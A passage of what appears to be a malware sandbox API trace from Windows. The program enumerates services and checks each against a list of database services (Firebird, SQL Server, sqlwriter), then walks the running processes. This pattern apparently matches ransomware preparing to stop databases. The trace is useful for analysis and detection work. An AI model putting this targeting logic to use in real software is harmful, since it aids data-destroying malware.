lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0216.081] CloseServiceHandle (hSCObject=0x236bb70) returned 1 [0216.082] lstrlenW (lpString="Appinfo") returned 7 [0216.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0216.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0216.082] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0216.082] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0216.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0216.082] lstrlenW (lpString="AppXSvc") returned 7 [0216.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0216.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0216.082] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0216.082] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0216.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0216.082] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0216.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0216.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0216.082] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0216.082] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0216.082] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0216.082] lstrlenW (lpString="Audiosrv") returned 8 [0216.082] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0216.082] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0216.082] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0216.083] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0216.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0216.083] lstrlenW (lpString="BFE") returned 3 [0216.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0216.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0216.083] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0216.083] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0216.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0216.083] lstrlenW (lpString="BITS") returned 4 [0216.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0216.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0216.083] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0216.083] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0216.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0216.083] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0216.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0216.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0216.083] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0216.083] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0216.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0216.083] lstrlenW (lpString="CDPSvc") returned 6 [0216.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0216.083] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0216.083] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0216.083] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0216.083] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0216.083] lstrlenW (lpString="ClickToRunSvc") returned 13 [0216.083] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0216.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0216.084] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0216.084] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0216.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0216.084] lstrlenW (lpString="ClipSVC") returned 7 [0216.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0216.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0216.084] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0216.084] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0216.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0216.084] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0216.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0216.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0216.084] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0216.084] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0216.084] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0216.084] lstrlenW (lpString="CryptSvc") returned 8 [0216.084] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0216.084] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0216.084] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0216.085] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0216.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0216.085] lstrlenW (lpString="DcomLaunch") returned 10 [0216.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0216.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0216.085] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0216.085] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0216.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0216.085] lstrlenW (lpString="DeviceAssociationService") returned 24 [0216.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0216.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0216.085] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0216.085] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0216.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0216.085] lstrlenW (lpString="Dhcp") returned 4 [0216.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0216.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0216.085] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0216.085] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0216.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0216.085] lstrlenW (lpString="Dnscache") returned 8 [0216.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0216.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0216.085] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0216.085] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0216.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0216.085] lstrlenW (lpString="DoSvc") returned 5 [0216.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0216.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0216.085] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0216.085] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0216.085] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0216.085] lstrlenW (lpString="DPS") returned 3 [0216.085] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0216.085] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0216.086] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0216.086] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0216.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0216.086] lstrlenW (lpString="DusmSvc") returned 7 [0216.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0216.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0216.086] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0216.086] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0216.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0216.086] lstrlenW (lpString="EventLog") returned 8 [0216.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0216.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0216.086] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0216.086] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0216.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0216.086] lstrlenW (lpString="EventSystem") returned 11 [0216.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0216.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0216.086] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0216.086] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0216.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0216.086] lstrlenW (lpString="FontCache") returned 9 [0216.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0216.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0216.086] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0216.086] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0216.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0216.086] lstrlenW (lpString="gpsvc") returned 5 [0216.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0216.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0216.086] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0216.086] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0216.086] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0216.086] lstrlenW (lpString="iphlpsvc") returned 8 [0216.086] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0216.086] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0216.086] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0216.087] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0216.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0216.087] lstrlenW (lpString="KeyIso") returned 6 [0216.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0216.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0216.087] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0216.087] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0216.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0216.087] lstrlenW (lpString="LanmanServer") returned 12 [0216.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0216.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0216.087] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0216.087] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0216.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0216.087] lstrlenW (lpString="LanmanWorkstation") returned 17 [0216.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0216.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0216.087] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0216.087] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0216.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0216.087] lstrlenW (lpString="lfsvc") returned 5 [0216.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0216.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0216.087] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0216.087] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0216.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0216.087] lstrlenW (lpString="LicenseManager") returned 14 [0216.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0216.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0216.087] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0216.087] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0216.087] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0216.087] lstrlenW (lpString="lmhosts") returned 7 [0216.087] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0216.087] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0216.087] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0216.087] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0216.088] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0216.088] lstrlenW (lpString="LSM") returned 3 [0216.088] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0216.088] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0216.088] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0216.088] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0216.088] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0216.088] lstrlenW (lpString="MpsSvc") returned 6 [0216.088] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0216.088] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0216.088] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0216.088] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0216.088] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0216.088] lstrlenW (lpString="NcbService") returned 10 [0216.088] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0216.088] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0216.088] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0216.088] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0216.088] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0216.088] lstrlenW (lpString="netprofm") returned 8 [0216.088] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0216.088] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0216.088] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0216.088] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0216.088] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0216.088] lstrlenW (lpString="NlaSvc") returned 6 [0216.088] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0216.088] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0216.088] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0216.088] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0216.088] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0216.088] lstrlenW (lpString="nsi") returned 3 [0216.088] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0216.088] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0216.088] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0216.088] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0216.088] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0216.089] lstrlenW (lpString="PcaSvc") returned 6 [0216.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0216.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0216.089] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0216.089] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0216.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0216.089] lstrlenW (lpString="PlugPlay") returned 8 [0216.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0216.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0216.089] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0216.089] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0216.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0216.089] lstrlenW (lpString="Power") returned 5 [0216.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0216.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0216.089] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0216.089] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0216.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0216.089] lstrlenW (lpString="ProfSvc") returned 7 [0216.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0216.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0216.089] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0216.089] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0216.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0216.089] lstrlenW (lpString="RpcEptMapper") returned 12 [0216.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0216.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0216.089] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0216.089] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0216.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0216.089] lstrlenW (lpString="RpcSs") returned 5 [0216.089] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0216.089] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0216.089] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0216.089] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0216.089] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0216.089] lstrlenW (lpString="SamSs") returned 5 [0216.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0216.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0216.090] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0216.090] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0216.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0216.090] lstrlenW (lpString="Schedule") returned 8 [0216.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0216.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0216.090] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0216.090] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0216.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0216.090] lstrlenW (lpString="SecurityHealthService") returned 21 [0216.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0216.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0216.090] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0216.090] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0216.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0216.090] lstrlenW (lpString="SENS") returned 4 [0216.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0216.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0216.090] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0216.090] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0216.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0216.090] lstrlenW (lpString="ShellHWDetection") returned 16 [0216.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0216.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0216.090] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0216.090] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0216.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0216.090] lstrlenW (lpString="Spooler") returned 7 [0216.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0216.090] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0216.090] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0216.090] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0216.090] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0216.090] lstrlenW (lpString="sppsvc") returned 6 [0216.090] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0216.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0216.091] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0216.091] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0216.091] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0216.091] lstrlenW (lpString="SSDPSRV") returned 7 [0216.091] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0216.091] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0216.091] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0216.091] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0216.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x424 [0216.095] Process32FirstW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.016] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.017] lstrlenW (lpString="System") returned 6 [0218.017] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.018] lstrlenW (lpString="smss.exe") returned 8 [0218.018] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.018] lstrlenW (lpString="csrss.exe") returned 9 [0218.018] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.019] lstrlenW (lpString="wininit.exe") returned 11 [0218.019] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.020] lstrlenW (lpString="csrss.exe") returned 9 [0218.020] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.021] lstrlenW (lpString="winlogon.exe") returned 12 [0218.021] Process32NextW (in: hSnapshot=0x424, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, 